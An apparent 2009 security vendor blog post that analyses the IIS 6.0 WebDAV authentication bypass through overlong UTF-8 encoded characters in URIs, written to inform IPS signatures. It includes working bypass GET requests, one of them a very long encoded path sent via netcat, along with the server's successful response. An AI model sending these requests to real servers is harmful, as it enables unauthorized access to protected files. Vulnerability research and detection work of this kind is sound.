- 1.866.352.6691 | INTL 1.512.821.6000
'Slash' and Burn - The IIS 6.0 WebDAV Bug
Update: The iisunicode.rb script was updated to use the correct character sets for each encoding size. Some typos and the description of the script were corrected
On May 12, 2009 Nikolaos Rangos released an advisory detailing an authentication bypass vulnerability in Microsoft IIS 6.0 servers running WebDAV. IIS 6.0 fails to properly handle unicode tokens when parsing URIs when WebDAV is enabled. This failure allows an attacker to access documents in a password-protected directory on the server, and in some configurations even upload documents to the server. Configurations that allow the IUSR_[HOSTNAME] Windows user write access to a WebDAV folder can be abused to perform file uploads. If the server is somewhat misconfigured, and ASP scripts can be uploaded to a directory outside the WebDAV folder (if for instance a non-WebDAV web folder is mapped to be inside the WebDAV root), and ASP scripts are enabled on the directory, it may be possible to execute ASP code on the server.
The advisory shows that the following request will bypass authentication on the IIS server:
GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
The protected URI in question is /protected/protected.zip, with the string %c0%af inserted in the middle. This character is a forward-slash that's been converted to UTF-8 Unicode using the overlong encoding method with a size of 2, the result of which has been URI-encoded. An example of this using the Rex library from the Metasploit framework is shown here:
Rex::Text.uri_encode(Rex::Text.to_unicode('/','utf-8','overlong',2))
=> "%c0%af" Thierry Zoller posted a comprehensive blogpost on the subject which included a video demonstrating HTTP GET requests downloading files from protected directories, HTTP PROPFIND requests listing protected directories, and HTTP PUT requests uploading ASP code to the IIS server. The video demonstrates the configuration of allowing ASP code to execute as I described above. He also cites work done by the folks behind SkullSecurity, who have posted their analysis as well as some code they created to exploit this vulnerability. Erik Fichtner also discovered this at the same time and contributed a patch to the metasploit module to support it. Check Point also released a a signature to detect attempts at exploiting this vulnerability.
I investigated this vulnerability in order to write strikes for this week's StrikePack. I wondered if %c0%af is the only unicode sequence that allows the authentication bypass. I setup an IIS server with WebDAV, created a password-protected directory, and put a single file inside the DAVroot that contained a string I could match on in a script. I then wrote a script that uses the Rex library, and manually tested a few characters and modified the UTF-8 encoding methods and byte sizes to use. I started finding that authentication bypass occurred using much more than a simple '/' character. I also started to see that it appeared that UTF-8 overlong encodings using 2- and 3-byte characters were the only cases in which authentication was bypassed. UTF-8 overlong encodings using 4-byte lengths or higher never bypassed authentication on the WebDAV server. The unicode-encoded character can appear anywhere inside of the protected directory name, meaning anywhere between the first and last forward slash in the directory part of the URI.
At this point, I decided to enumerate all the single-byte characters in the ASCII range using UTF-8 overlong encodings of size 2 and 3 to see what would work for bypassing authentication. The results were interesting. When using an encoding size of 2, 118 characters bypassed authentication. When using an encoding size of 3, 177 characters bypassed authentication. The differences in the 2 encoding sizes also showed something else interesting. In size-2 mode, many, but not all, of the alphabetic characters successfully bypassed authentication. However, in size-3 mode, no alphabetic characters were successful . In size-2 mode, no character above ASCII value 0x7f was successful , but in size-3 mode, they all were. I'm unsure of the reason behind why this is, but it will make detection a little more difficult for IPS signature teams.
After this discovery, I wondered if there were any invalid UTF-8 encodings that would work that I hadn't found yet. I wrote a script to enumerate all 65K possibilities from %00%00 to %ff%ff. The results from this method exactly agreed with my findings using the Rex library. I have written a version to brute thru the size-3 characters, but that set is 16 million long, which has exceeded my local resource limits. After correcting that, if there are any new findings, I will update this blog post.
I am making the script that uses the Rex library available. This script will produce an HTTP GET request that you can pipe to your server using netcat or something similar. You'll need to modify the Host: header, as well as the path to your protected directory ('/protected') and filename ('secretfile.txt').
Don't forget that any number of UTF-8 characters can be used, which makes detection somewhat interesting. IDS and IPS signatures for this vulnerability must be able to detect all possible encoded characters using multiple UTF-8 encoding lengths in order to block attempts to exploit this vulnerability.
I'll leave you with this example from some of my testing:
$ iisunicode.rb utf-8 overlong 2 1000 | nc iisserver 80
GET /protect%c0%8a%c1%b3%c0%8a%c0%bf%c1%ba%c0%91%c1%93%c0%b9%c0%bb%c0%a4%c1%ab%c0%99%c0%91%c1%8b%c0%86%c1%86%c1%96%c0%ab%c0%a7%c1%88%c0%b9%c1%a8%c1%b1%c1%a6%c0%a9%c1%a9%c1%95%c1%b3%c0%8c%c0%91%c1%be%c1%80%c0%84%c1%a4%c1%86%c0%b9%c0%86%c0%91%c0%94%c0%9e%c0%98%c1%bb%c0%a3%c1%a3%c1%b7%c1%9e%c1%a0%c1%b5%c1%8c%c0%b6%c1%b2%c1%88%c1%8b%c0%89%c0%a1%c1%98%c1%80%c0%85%c0%ac%c0%a8%c1%b6%c1%85%c0%9b%c0%8b%c0%b6%c0%8e%c1%a0%c1%b3%c1%8a%c1%91%c1%b0%c1%a3%c0%94%c0%9e%c1%99%c0%82%c1%a2%c1%89%c1%bd%c1%9e%c1%9a%c0%b0%c0%a4%c1%b5%c0%88%c1%88%c0%ba%c1%b9%c0%80%c1%86%c1%97%c0%aa%c0%9f%c1%bd%c0%82%c0%82%c0%a8%c0%84%c1%aa%c1%97%c1%a7%c0%9a%c1%b0%c1%ab%c1%ac%c1%87%c0%84%c1%9a%c0%8b%c0%ba%c1%b8%c0%88%c0%95%c1%97%c1%9c%c1%a1%c0%ad%c1%a9%c1%8e%c0%8a%c0%b1%c1%9f%c0%a0%c0%8a%c1%aa%c0%84%c1%8a%c0%92%c1%bb%c1%a9%c1%ac%c1%a6%c1%b9%c1%8c%c1%ac%c1%82%c1%98%c0%99%c1%ad%c0%a2%c0%b9%c0%8c%c0%9b%c0%8e%c1%b3%c1%b8%c0%b6%c1%bf%c0%a7%c0%b0%c0%95%c1%a6%c0%8a%c1%b1%c1%9f%c0%a5%c0%a2%c0%b9%c0%a4%c0%a5%c0%8e%c0%98%c0%aa%c0%8b%c1%93%c0%ae%c0%b5%c0%97%c1%ba%c1%bb%c0%91%c1%b3%c0%a1%c1%ad%c1%92%c0%ae%c0%b0%c1%aa%c0%bd%c1%b3%c1%bb%c0%8b%c1%87%c1%89%c0%82%c1%93%c1%b4%c0%a8%c0%84%c1%8e%c0%a5%c0%9c%c0%ac%c0%ae%c1%be%c0%a2%c1%b3%c1%bd%c0%a8%c0%ba%c0%97%c1%ac%c1%ac%c1%ae%c0%ae%c0%b2%c1%93%c1%9c%c0%95%c0%aa%c1%91%c0%83%c0%82%c0%ad%c1%a0%c1%a1%c0%8b%c1%ac%c1%86%c0%80%c1%a2%c1%b0%c1%85%c1%bd%c1%87%c0%af%c0%92%c1%9e%c1%91%c1%86%c0%94%c1%9a%c0%aa%c0%b3%c1%85%c0%8a%c1%92%c0%a7%c1%82%c0%a7%c0%8b%c0%ad%c1%8a%c1%9b%c0%9f%c0%b8%c0%8b%c1%9c%c1%94%c1%b7%c0%bd%c1%a3%c1%a8%c1%b2%c0%83%c0%89%c1%a0%c0%9a%c0%bb%c1%b9%c1%9c%c1%88%c0%af%c0%b4%c1%83%c1%bf%c1%8c%c0%98%c0%9c%c0%be%c0%9f%c1%99%c0%ae%c0%92%c0%94%c1%b0%c1%b3%c0%85%c1%9a%c0%8e%c0%80%c0%b2%c1%aa%c0%95%c1%84%c1%b7%c0%b5%c1%8b%c0%b8%c0%a1%c0%99%c1%96%c0%b7%c1%b0%c0%bb%c1%b6%c0%a4%c1%82%c0%b0%c1%a2%c1%a3%c0%97%c1%b7%c1%9c%c0%bf%c1%93%c0%98%c0%8c%c1%ae%c0%ab%c1%91%c0%a7%c1%91%c0%ae%c0%8b%c1%ba%c0%88%c1%aa%c1%bf%c1%94%c1%8b%c0%a8%c1%be%c0%8c%c0%af%c1%bb%c1%97%c0%bd%c0%bb%c1%8e%c1%bd%c1%bf%c0%8b%c0%9c%c1%a7%c0%9f%c0%a8%c0%af%c1%ae%c1%95%c0%8a%c1%ad%c1%a5%c0%91%c1%bc%c0%a9%c1%87%c0%85%c1%89%c0%94%c1%ad%c0%ae%c1%91%c0%8a%c0%a8%c0%9e%c0%96%c0%a2%c0%bd%c1%92%c1%b3%c1%a0%c0%83%c1%87%c0%95%c1%a3%c0%b3%c1%91%c0%b0%c0%95%c0%a1%c0%93%c1%8e%c0%b4%c0%8e%c1%a8%c1%9c%c0%be%c0%a2%c0%9e%c1%86%c0%87%c1%96%c1%8c%c0%80%c1%bd%c1%b1%c0%a9%c1%8c%c0%88%c1%b7%c1%ab%c1%96%c1%8e%c1%97%c0%8c%c0%82%c0%82%c1%88%c1%a3%c1%aa%c1%bf%c1%92%c1%9a%c0%9b%c1%a2%c1%b9%c1%bf%c0%ab%c1%8a%c0%af%c0%9b%c0%99%c1%98%c0%83%c0%8b%c0%bd%c0%a9%c0%bc%c0%a9%c0%a4%c0%a4%c1%b4%c1%95%c0%ab%c0%b8%c1%ac%c1%bd%c1%9b%c0%a6%c0%b2%c0%8e%c0%91%c1%b1%c1%b1%c0%95%c0%b4%c1%8e%c1%83%c1%a8%c1%a4%c1%9c%c0%83%c0%8b%c0%b1%c0%8c%c1%8c%c0%8b%c1%bc%c0%bf%c0%93%c1%b6%c1%a2%c1%9f%c1%9c%c1%84%c1%8b%c1%84%c0%a2%c0%ba%c1%82%c0%9f%c1%97%c0%bf%c1%96%c0%96%c0%a7%c0%97%c1%8c%c0%9c%c1%9e%c0%91%c0%bc%c0%9e%c0%93%c1%ba%c1%84%c0%92%c0%89%c1%b9%c0%8b%c1%85%c1%b4%c0%99%c0%8c%c1%82%c1%ae%c0%b5%c0%ac%c1%9c%c1%b9%c0%87%c0%91%c1%84%c0%a9%c0%a4%c0%bb%c0%b7%c0%b4%c0%82%c1%9e%c1%8c%c0%9f%c1%8b%c0%9a%c1%a3%c0%a2%c1%88%c0%9b%c0%86%c0%ba%c0%92%c1%98%c1%99%c0%84%c1%b8%c0%a0%c1%95%c1%88%c1%a5%c0%8e%c1%89%c1%87%c1%b6%c1%89%c1%a2%c0%b5%c0%87%c1%a2%c1%8b%c0%83%c1%be%c0%98%c1%a6%c1%a0%c1%9c%c1%a6%c1%bd%c1%b3%c0%a0%c0%a7%c0%9f%c1%9a%c0%87%c0%ba%c0%b3%c0%a7%c1%a6%c0%af%c0%8c%c0%b7%c0%ac%c0%98%c0%95%c1%94%c0%97%c0%86%c1%9a%c0%b9%c0%96%c0%a3%c1%94%c1%93%c1%b2%c1%a9%c1%92%c1%98%c0%b3%c0%94%c1%ac%c0%88%c1%b5%c0%89%c0%a1%c0%a2%c0%a9%c0%9a%c1%be%c0%82%c0%a9%c1%82%c1%94%c0%9e%c0%b2%c0%b6%c1%b9%c1%98%c1%9c%c0%80%c0%94%c1%94%c1%b4%c0%84%c1%92%c1%9c%c1%86%c1%be%c1%b8%c0%99%c0%88%c1%bd%c1%88%c1%8b%c1%b6%c1%b1%c0%ab%c1%85%c1%97%c0%9b%c0%8a%c1%b5%c0%bb%c1%92%c1%97%c0%95%c0%b9%c1%a6%c0%b9%c1%b3%c0%98%c0%89%c0%94%c0%b0%c0%85%c0%aa%c0%ab%c0%8e%c1%8a%c1%80%c0%a4%c0%bf%c1%96%c1%a5%c0%b2%c0%92%c0%b0%c0%b7%c0%9a%c0%8a%c1%b6%c1%a6%c0%ab%c1%af%c1%bd%c1%be%c0%91%c1%b7%c0%b0%c0%b8%c0%83%c1%a3%c0%bc%c0%82%c1%bd%c1%ba%c0%83%c1%b9%c1%98%c0%88%c1%9e%c1%bf%c0%9c%c1%ac%c1%bd%c1%a3%c0%a9%c0%ba%c0%bf%c0%a0%c0%bc%c0%b1%c1%b3%c1%98%c1%91%c0%9b%c1%a4%c0%8b%c0%ab%c0%89%c1%91%c0%b5%c1%a0%c1%9c%c1%9b%c1%bb%c0%b8%c1%ad%c1%96%c0%a8%c1%8c%c1%a2%c1%97%c1%89%c0%89%c0%80%c0%a5%c0%ac%c0%a8%c0%ba%c0%89%c1%ad%c0%97%c1%8c%c1%b3%c1%92%c0%a0%c0%86%c1%a2%c1%be%c0%8b%c0%93%c0%bf%c1%b2%c1%b2%c0%b0%c0%b5%c1%9b%c0%a7%c1%aa%c0%be%c0%af%c1%b0%c0%a6%c0%8b%c1%b8%c1%be%c0%9b%c0%bf%c0%b0%c1%a6%c0%aa%c1%b5%c1%95%c1%95%c1%89%c1%b7%c1%ab%c1%a0%c1%84%c0%b9%c0%b2%c1%a6%c0%a8%c0%8e%c1%9c%c0%a2%c0%84%c1%85%c1%89%c1%8c%c0%a4%c1%86%c0%ba%c0%a1%c0%b6%c0%98%c1%b8%c0%b8%c0%aa%c0%a4%c0%b4%c0%a0%c0%86%c1%95%c0%83%c0%9a%c1%bf%c0%86%c1%b2%c0%bf%c0%85%c1%bc%c1%a7%c1%8e%c1%97%c1%ab%c1%86%c0%a8%c1%92%c1%89%c1%b7%c1%aa%c1%bf%c0%a0%c1%a3%c0%80%c1%8e%c0%ab%c1%ad%c1%a4%c1%82%c1%87%c1%b5%c1%83%c0%92%c0%b9%c1%b3%c1%ab%c0%9c%c0%b8%c1%82%c1%b6%c0%96%c1%bd%c1%99%c1%9e%c0%b8%c1%8c%c0%97%c1%ba%c1%b3%c0%a9%c1%ba%c1%95%c0%ac%c1%b1%c1%a1%c0%ab%c0%84%c1%a5%c0%95%c1%a2%c0%9a%c1%b4%c0%a8%c0%ba%c0%94%c0%83%c1%ab%c1%9a%c0%ac%c0%94%c1%82%c0%a8%c1%b6%c1%b5%c1%a9%c0%92%c1%a8%c1%9c%c1%82%c0%87%c0%93%c0%97%c0%a1%c0%b7%c1%a1%c1%a3%c0%98%c1%a1%c0%a9%c1%b2%c1%a7%c1%96%c1%9e%c0%84%c0%84%c1%93%c0%a7%c0%84%c0%85%c0%94%c1%bb%c1%b9%c1%a5%c1%87%c0%a1%c0%8e%c0%a6%c0%98%c0%b0%c0%89%c0%8e%c1%86%c0%96%c0%87%c1%a6%c1%b7%c0%bf%c0%b1%c0%8b%c0%99%c1%a6%c0%87%c1%85%c0%ba%c1%85%c1%b1%c0%aa%c0%b5%c1%b9%c1%a3%c1%b7%c0%98%c1%96%c0%a2%c0%86%c1%ae%c0%85%c0%ab%c0%8c%c1%a5%c1%b2%c1%91%c0%8e%c1%ac%c0%89%c0%aa%c0%b7%c1%a1%c0%8b%c1%a7%c1%9b%c0%b6%c0%b5%c0%91%c1%91%c0%bd%c0%b0%c1%a4%c0%80%c0%85%c0%b4%c1%9a%c0%9f%c0%a0%c1%87%c1%b5%c0%a1%c1%bc%c0%b9%c1%91%c1%a2%c1%87%c0%a3%c1%b4%c0%9e%c0%8b%c0%b6%c0%a7%c0%b5%c1%bc%c1%82%c0%ba%c1%96%c0%8b%c0%bb%c0%b6%c1%a5%c0%8b%c0%85%c1%b5%c1%b5%c0%b4%c0%9f%c1%9c%c1%87%c1%87%c0%b7%c1%b7%c0%95%c0%96%c0%9b%c1%91%c1%93%c0%a0%c1%b4%c1%b1%c1%b2%c0%86%c0%a2%c0%82%c0%bd%c1%91%c0%99%c1%ae%c0%a9%c0%bc%c0%8a%c0%92%c0%bb%c1%80%c1%8a%c0%a2%c0%aa%c0%94%c0%bc%c0%a7%c0%b8%c0%a8%c0%9e%c0%a1%c0%ad%c0%8a%c0%93%c0%9c%c0%8a%c1%89%c1%b1%c1%83%c1%b4ed/secretfile.txt HTTP/1.1
Translate: f
Connection: close
Host: iisserver
HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 May 2009 21:10:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Content-Length: 5
ETag: "5e5fb737f8dac91:a6d"
Last-Modified: Fri, 22 May 2009 16:13:17 GMT
Accept-Ranges: bytes
PWNT!
Customers can download StrikePacks 46157/46159 to get access to new strikes that test this vulnerability. StrikeCenter authentication is required.
Tags: